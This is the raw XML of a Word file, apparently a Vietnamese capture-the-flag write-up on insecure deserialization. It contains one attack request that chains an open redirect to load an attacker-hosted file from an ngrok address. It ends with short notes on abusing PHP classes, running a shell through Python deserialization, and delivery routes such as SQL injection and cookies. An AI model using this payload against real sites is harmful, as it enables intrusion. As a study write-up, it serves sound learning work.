          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C584C52" w14:textId="77777777" w:rsidR="000E4F31" w:rsidRDefault="000E4F31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E979282" w14:textId="27DC6EBB" w:rsidR="00C40A6D" w:rsidRDefault="00C40A6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385E3573" w14:textId="11354CCE" w:rsidR="000705EB" w:rsidRPr="00240774" w:rsidRDefault="00C40A6D" w:rsidP="000705EB">
      <w:pPr>
        <w:ind w:right="-138"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00AF1327" w:rsidRPr="00240774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240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/index.php?mode=extract&amp;id=index.php%3fmode%3dredirect%26url%3dhttps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90BCD2" w14:textId="41295C5F" w:rsidR="00C40A6D" w:rsidRPr="00240774" w:rsidRDefault="00C40A6D" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%3a%2f%2f8a1a-2a09-bac5-d469-16c8-00-245</w:t>
      </w:r>
      <w:r w:rsidR="00AF1327" w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22.ngrokfree.app%2fabc.txt&amp;host=local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC97F6D" w14:textId="4F2A6D69" w:rsidR="006004F8" w:rsidRDefault="006004F8" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B435E1" w14:textId="4274C89F" w:rsidR="006004F8" w:rsidRDefault="006004F8" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440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487D92E" wp14:editId="1A9EA2FF">
            <wp:extent cx="5197180" cy="3689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29" t="15874" r="36840" b="26154"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240475" cy="3720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4145A5" w14:textId="1D636652" w:rsidR="000E4F31" w:rsidRDefault="000E4F31" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095923FF" w14:textId="77777777" w:rsidR="000D463F" w:rsidRDefault="000D463F" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A35A13" w14:textId="22966EC5" w:rsidR="000E4F31" w:rsidRDefault="000E4F31" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-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Challenge bị lỗi nên mình không đọc flag được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00244094" w14:textId="09CE2C69" w:rsidR="00240774" w:rsidRDefault="00240774" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E33AE82" w14:textId="77777777" w:rsidR="00240774" w:rsidRPr="00240774" w:rsidRDefault="00240774" w:rsidP="00240774">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bài học mình rút ra được là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4C2FC" w14:textId="77777777" w:rsidR="00240774" w:rsidRDefault="00240774" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4273AB6B" w14:textId="7FBA9A0C" w:rsidR="00240774" w:rsidRDefault="00240774" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-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Insecure deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A1C70" w14:textId="7E69E21E" w:rsidR="00240774" w:rsidRPr="00240774" w:rsidRDefault="00240774" w:rsidP="00240774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong php: tận dụng những class sẵn có để khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1482EC" w14:textId="15A90482" w:rsidR="00240774" w:rsidRDefault="00240774" w:rsidP="00240774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong python: mình sẽ tạo 1 lớp ở bên ngoài để thực thi shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EA33B" w14:textId="28BF8827" w:rsidR="00240774" w:rsidRDefault="00240774" w:rsidP="00240774">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D70926" w14:textId="23FD9032" w:rsidR="00240774" w:rsidRPr="00240774" w:rsidRDefault="00240774" w:rsidP="00240774">
      <w:pPr>
        <w:ind w:right="-144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Cách truyền serialized data: open redirect, sql injection, cookie,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B3978" w14:textId="77777777" w:rsidR="00240774" w:rsidRDefault="00240774" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01820541" w14:textId="7410521F" w:rsidR="000705EB" w:rsidRDefault="000705EB" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312B625B" w14:textId="77777777" w:rsidR="000705EB" w:rsidRDefault="000705EB" w:rsidP="00AF1327">
      <w:pPr>
        <w:ind w:right="-1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D622606" w14:textId="4959864D" w:rsidR="00AC7959" w:rsidRDefault="00AC7959">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8214D0" w14:textId="77777777" w:rsidR="00AC7959" w:rsidRDefault="00AC7959">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B8A37A" w14:textId="3B64684C" w:rsidR="00AC7959" w:rsidRDefault="00AC7959">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1601F185" w14:textId="77777777" w:rsidR="00AC7959" w:rsidRPr="00A0418F" w:rsidRDefault="00AC7959">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AC7959" w:rsidRPr="00A0418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1B83DF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8F613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D2F"/>
    <w:rsid w:val="000705EB"/>
    <w:rsid w:val="000D463F"/>
    <w:rsid w:val="000E4F31"/>
    <w:rsid w:val="00115D2F"/>
    <w:rsid w:val="00240774"/>
    <w:rsid w:val="00287C44"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003D6BA2"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="006004F8"/>
    <w:rsid w:val="006F61FD"/>
    <w:rsid w:val="008120E3"/>
    <w:rsid w:val="009677CE"/>
    <w:rsid w:val="00A0418F"/>
    <w:rsid w:val="00AC7959"/>
    <w:rsid w:val="00AF1327"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C40A6D"/>
    <w:rsid w:val="00CB495C"/>
    <w:rsid w:val="00CD7388"/>
    <w:rsid w:val="00D517CC"/>
    <w:rsid w:val="00DF5AE5"/>
    <w:rsid w:val="00F61615"/>
    <w:rsid w:val="00FB2D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01500D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8285A205-91A3-3744-AC20-A7A391C125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2407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7</Pages>
  <Words>330</Words>
  <Characters>1884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2024-01-07T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-07T15:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>